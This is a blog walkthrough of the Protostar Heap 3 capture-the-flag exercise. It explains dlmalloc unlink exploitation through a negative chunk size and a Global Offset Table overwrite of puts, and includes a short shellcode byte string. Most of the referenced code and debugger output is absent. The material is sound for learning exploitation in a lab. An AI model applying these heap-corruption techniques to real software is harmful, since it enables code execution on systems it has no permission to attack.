Protostar Heap 3 Walkthrough

Having previously tackled the last stack challenge in Protostar from Exploit Exercises (, we’re now switching to the last heap challenge (

Heap 3 Challenge

Here’s the source code for the Protostar Heap 3 challenge:

The goal is to call the winnder() function. As strcpy is used, it is possible to overflow all three of the dynamically allocated buffers, so let’s see what we can do with that.


Heap is used in C programs for dynamic memory management. libc provides an easy to use interface (malloc/ free) to allocate and de-allocate memory regions. The version of libc in Protostar uses an implementation of malloc called dlmalloc, after the name of it’s original creator, Doug Lea. The control structures used by malloc are stored in-band with the data, which allows manipulation of the control structures when heap buffer overflow is possible, as above.

malloc allocates memory in chunks that have the following structure:

prev_size stores the size of the previous chunk, size stores the size of the current chunk. Chunk size will always be a multiple of 8 bytes for alignment, which means that the 3 lowest bits of the size will always be 0. malloc uses these three bits, most notably the least significant bit will indicate whether the previous chunk is in use or free. So, if we see 0x29 in the size field, the size of the current chunk is 40 (hex 0x28), and the previous chunk is in use. When malloc is called, it initializes prev_size and size and returns the address of the memory right after (mem in the picture above). Fields depicted as fd and bk are ignored for used chunks and the memory is used for the program data.

When a chunk is free (i.e. after free was called to de-allocate the chunk) it is stored in a double-linked list structure, and the fd field contains the address of the next free chunk (forward pointer), and bk field contains the address of the previous free chunk (backward pointer). Thus these pointers overwrite the beginning of the data in an unused chunk.

This is how malloc_chunk is defined in malloc.c (simplified):

Now let’s run the program in debugger and see how it all works:

We load the program into GDB and set breakpoints after all of the malloc calls, after all of the strcpy calls, and after all of the free calls. Let’s run it:

After malloc we inspect program’s memory layout to find the location of the heap (0x0804c000) and configure GDB to print current CPU instruction and 40 32-bit values from the top of the heap every time a breakpoint is reached.

The highlighted portion of the heap is the first allocated chunk. We can see that prev_size is 0, size is 0x29 (40 bytes, and the least significant bit is set to 1 to indicate that the previous chunk is in use), and then 32 bytes of the allocated memory.

Let’s continue:

We see that strcpy copied the data into the allocated memory (‘A’ is ASCII 0x41, ‘B’ is 0x42, ‘C’ is 0x43).

And now we see something unexpected. Firstly, prev_size is still 0 in all the chunks, but it should contain the size of the previous block. Secondly, while the fd correctly points to the next free block (0x0804c028 for the first chunk, which is the address of the second chunk), bk doesn’t seem to be set. Also, the least significant bit of the size field have not been set to indicate the previous chunk is free. What is going on?

Enter Fastbins

The reason this is not working the way we expected is due to the fact that the allocated buffers are small. When a chunk is smaller than 64 bytes (by default), malloc will use a simplified data structure (fastbin) and will ignore prev_size, bk, and the “previous chunk in use” bit.

So why did we talk about all these fields if all the chunks are small? For our exploit code we will need the chunks to be treated as regular chunks by malloc, not as fastbin chunks.


When free is called on a chunk, if there are free chunks adjacent to the chunk being freed (i.e. right before or right after), free will consolidate them into a larger free chunk. Free chunks are stored in a double-linked list (ignoring fastbin chunks for now), and when doing the consolidation free will remove the adjacent free chunk that is being consolidated from the list as it will become a part of a new, larger, chunk. Here’s what happens conceptually (there’s much more code and edge cases, like checking if the current chunk is the last one in the heap):

The unlink part is done through unlink macro, here’s a simplified version:

This is called with the chunk to be unlinked as the first argument P, and temporary variables to store pointers to previous and next free chunks as arguments BK and FD. When a chunk is unlinked it makes the next free chunk P->fd and the previous free chunk P->bk point at each other. Here’s a visual:

So unlink basically writes the value of P->bk to the memory at address (P->fd)+12 and the value of P->fd to the memory at address (P->bk)+8. The changed memory is highlighted in blue. If we can control the values of P->fd and P->bk we can overwrite arbitrary memory, with the restriction being that both (P->fd)+12 and (P->bk)+8 have to be writeable.

Global Offset Table

Have a look at the disassembly of main() again. The source code calls printf at the end of main(), but as part of optimizations compiler determines that the string is constant and replaces it with a call to puts at address 0x08048790. Let’s see what it does:

puts is not called directly, but rather through PLT (Procedure Linkage Table) that jumps to the puts address contained in GOT (Global Offset Table). This is part of dynamic library linking, here’s a video explanation from LiveOverflow:

We can use the Global Offset Table to redirect the execution flow if we overwrite the address at 0x0804b128.

Our plan is clear now. We’ll store shellcode that will call winner() somewhere on the heap, we will then force the chunk consolidation and the call to unlink on a specially crafted chunk. The chunk will contain 0x0804b11c = (0x0804b128-12) in fd field and the address of the shellcode in the bk field. We cannot write the address of winner() to the bk as that part of memory is not writeable and BK->fd will also be updated as part of unlink.

Negative Chunk Size

We need one more little trick explained in the Phrack article linked below — what if we have -4 (0xfffffffc) as the chunk size?

  • When determining whether to use fastbin, malloc is casting the chunk size to unsigned int, so -4 is bigger than 64.
  • The least significant bit of 0xfffffffc is not set, which indicates the previous adjacent chunk is free and unlink will be called for it!
  • The address of the previous adjacent chunk will be calculated by subtracting -4 (i.e. adding 4) from the current chunk’s beginning.
  • The address of the next adjacent chunk will be calculated by adding -4 (i.e. subtracting 4) from the current chunk’s beginning. Its size will also be -4.
  • The value right before the start of the current chunk will be used to determine whether the next adjacent chunk is free. This should be set to an odd number to avoid memory corruption (otherwise unlink will be called for the next adjacent chunk also as part of free chunk consolidation).

If we can get free called on this specially crafted chunk, it will cause the value of puts@GOT to be replaced with the address of our shellcode. Note, the shellcode should either be super short (8 bytes or less), or jump 12 bytes ahead as the memory at “addr of shellcode”+8 will be overwritten by unlink.

Using negative size also takes care of the NULL/0x00 bytes, which we cannot put arbitrarily into our buffers as they will be treated as string terminators.


We just need to call winner():

This assembler snippet should do it:

I used to turn these instructions into "\x68\x64\x88\x04\x08\xc3", which fits into the 8 bytes we have available.

The Exploit

We’ll use the third buffer for our crafted chunk. We’ll store the shellcode in the middle of the second buffer, and also will use it to overwrite prev_size and size of the last block with 0xfffffffc.

The exploit saves these buffers in files as /tmp/[A,B,C], so heap3 should be called as:

It works! Let’s check it in GDB. We’ll set breakpoints at the first call to free and at the call to puts:

I’ve highlighted the shellcode at address 0x0804c040 and our fake chunk at address 0x0804c050. Let’s continue:

We check that we have correctly updated the puts address in GOT to point to the shellcode. I’ve also highlighted the address after the shellcode that was overwritten by unlink.

Final Thought

It took me a while to figure out how heap exploits work, it seemed like dark magic in the beginning. Also, fastbin stuff was very confusing. I hope this walkthrough helped.


Phrack issue #57, Once upon a free() by anonymous —

LiveOverflow Binary Hacking course —

Protostar Heap 3 Walkthrough from Joshua Wang:

Random rumblings about #InfoSec. The opinions expressed here are my own and not necessarily those of my employer.